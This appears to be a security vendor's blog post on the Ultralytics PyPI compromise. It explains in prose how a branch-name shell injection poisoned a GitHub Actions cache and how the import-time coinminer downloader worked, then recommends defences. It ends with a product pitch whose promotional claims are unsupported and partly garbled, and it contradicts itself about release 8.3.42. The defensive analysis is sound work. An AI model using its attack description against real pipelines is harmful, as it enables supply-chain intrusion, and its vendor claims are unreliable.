On December 4, 2024, two Ultralytics releases (8.3.41 and 8.3.42) shipped a cryptocurrency miner to every pip install ultralytics user before maintainers could yank them. The package pulls roughly 60 million monthly downloads across ML pipelines, CI runners, and research notebooks, so the blast radius was large. The root cause was not stolen credentials or a typosquat. It was a poisoned GitHub Actions cache that mutated the published artifact after tests passed but before PyPI upload.
This post walks through the mechanics, what defenders saw on the wire, and which controls would have actually stopped it.
How did the attackers get code into a signed release?
The attackers did not bypass trusted publishing. They poisoned the build environment that produced the artifact uploaded under trusted publishing.
Ultralytics used a GitHub Actions workflow that built wheels inside a job using the actions/cache mechanism to speed up Python dependency installs. An earlier pull request from a fork triggered a workflow with a branch name containing a shell injection payload. That payload ran in the context of a privileged workflow step, wrote a malicious payload into the cache, and the cache was subsequently restored in the release build job. By the time the release workflow ran, the restored cache contained altered build tooling. The wheel was rebuilt with attacker-controlled code, signed, and pushed to PyPI through the legitimate OIDC-based trusted publishing flow.
The consequence matters: every downstream verification control (PyPI provenance, Sigstore attestation, signed tag, GitHub release notes) reported "valid" because the malicious code was baked in before those signatures were produced. Provenance tells you who built it. It does not tell you whether the build environment was clean.
What did the malware actually do on install?
The injected payload was a Monero-style coinminer staged through a downloader, executed at import time.
Static analysis of 8.3.41 showed a modified __init__.py-adjacent module that executed a shell command during the first call to common Ultralytics functions. The command fetched a second-stage binary from an attacker-controlled host and spawned it as a background process. On GPU-equipped hosts, the miner specifically targeted CUDA capabilities. On CPU-only hosts, it fell back to a smaller miner. There was no data exfiltration component observed in public reverse-engineering writeups, but the execution primitive was a generic downloader, meaning a version 8.3.42 push with different second-stage logic would have been trivial.
The important detail for defenders: static SBOM diffing against 8.3.40 would have flagged the new behavior only if the diff included modified entrypoints and install-time scripts. A dependency list comparison alone missed it.
Why didn't detection fire faster?
Detection lagged because the artifact looked authentic on every conventional integrity check.
PyPI stored valid provenance. The Git tag matched the release. The hash in pip's warehouse matched what users downloaded. The first credible reports came from users who noticed elevated CPU or GPU usage after upgrading and started reading the package contents. About six hours passed between the first upload and the first public report, and another several hours before Ultralytics yanked the release and cut a clean 8.3.43. For pipelines with unpinned versions or >= constraints, that window was enough to propagate the miner into thousands of container images.
The gap here is behavioral. Integrity checks verify that the artifact is what the publisher intended to ship. They cannot catch cases where the publisher's build system was intentionally corrupted.
Which teams were most exposed?
Teams with three patterns took the worst hit: unpinned dependencies, rebuild-on-push Docker images, and shared CI caches.
Unpinned installs grabbed the poisoned version within minutes of upload. Docker base images that ran pip install ultralytics during build produced poisoned layers that then flowed into ECR, GHCR, and internal registries. Shared CI caches meant the miner kept executing in subsequent unrelated builds even after the upstream package was yanked, because cached wheels persisted. A meaningful number of teams were still discovering poisoned layers days later when auditing running containers for unexpected outbound connections.
The cleanest remediation for affected teams was: identify all image digests built between December 4 and December 5 that included Ultralytics, rebuild from 8.3.43 or later, invalidate CI caches, and audit any long-running training jobs started in that window.
What controls would have prevented this?
Four controls, in order of how much they would have reduced damage.
First, pinning transitive and direct dependencies with lockfiles and hash verification. pip install --require-hashes with a resolved requirements.txt would have refused the poisoned wheel because its hash did not match the pre-incident lockfile.
Second, untrusted fork workflows should never share cache or secret scope with release workflows. The GitHub Actions design allows this separation but requires explicit pull_request_target discipline, minimal-scope tokens, and separate cache keys keyed to trusted refs only.
Third, reproducible builds with multi-party attestation. If the build ran in two independent environments and both produced matching artifacts before PyPI upload, the single-environment poisoning would have failed verification.
Fourth, install-time behavioral sandboxing. Tools that observe what a package does during pip install and first import, and compare against a historical behavioral baseline, would have flagged the unexpected outbound DNS and new child process. SBOM alone does not capture this; runtime signals do.
Most teams had none of these. A few had hash pinning, and those teams were quietly unaffected.
What does this tell us about trusted publishing?
Trusted publishing protects the link between publisher and registry. It does not protect the build environment that produces the artifact, and that is where the attack happened.
Sigstore, PyPI's trusted publishing flow, and GitHub OIDC attestations are valuable and should be adopted everywhere they are available. But they answer a narrower question than most teams assume. The attestation says: "this artifact was built by this workflow on this commit of this repository." It does not say: "this artifact was built from an uncompromised environment using unmodified tooling." The Ultralytics attackers did not fake the attestation; they poisoned the inputs to an otherwise-legitimate attestation-producing flow.
The correct response is not to abandon trusted publishing. It is to combine it with reproducible builds and build-environment isolation. If you can build the same artifact twice, in independent environments, and get bit-for-bit matching outputs, a single-environment compromise fails reproducibility checks before it reaches the registry. Reproducible builds are operationally harder than they sound (timestamps, path differences, non-determinism in compilers), but the Python ecosystem has made meaningful progress here, and the payoff is direct: the Ultralytics attack would have failed cross-environment comparison. For internal build pipelines producing critical artifacts, running two parallel builds in differently-configured environments and diffing the output is a concrete, achievable control.
How Safeguard.sh Helps
Safeguard.sh's reachability analysis would have correlated the new downloader primitive in 8.3.41 with actual call paths in your codebase, cutting the 60-80% noise reduction typical for broad SCA alerts and escalating this specific regression to the top of the queue. Griffin AI flags behavioral deltas between package versions (new network egress, new process spawns, new filesystem writes at import time) rather than relying solely on signature matches, so the Ultralytics payload would have surfaced independently of public disclosure. Our SBOM pipeline tracks artifacts at 100-level dependency depth and continuously re-evaluates them against upstream events, and the TPRM workflow would have pinned Ultralytics under ML supplier controls where any version bump triggers a review gate. For teams running containerized training workloads, container self-healing would have automatically rolled back the poisoned image layer the moment outbound miner traffic was observed.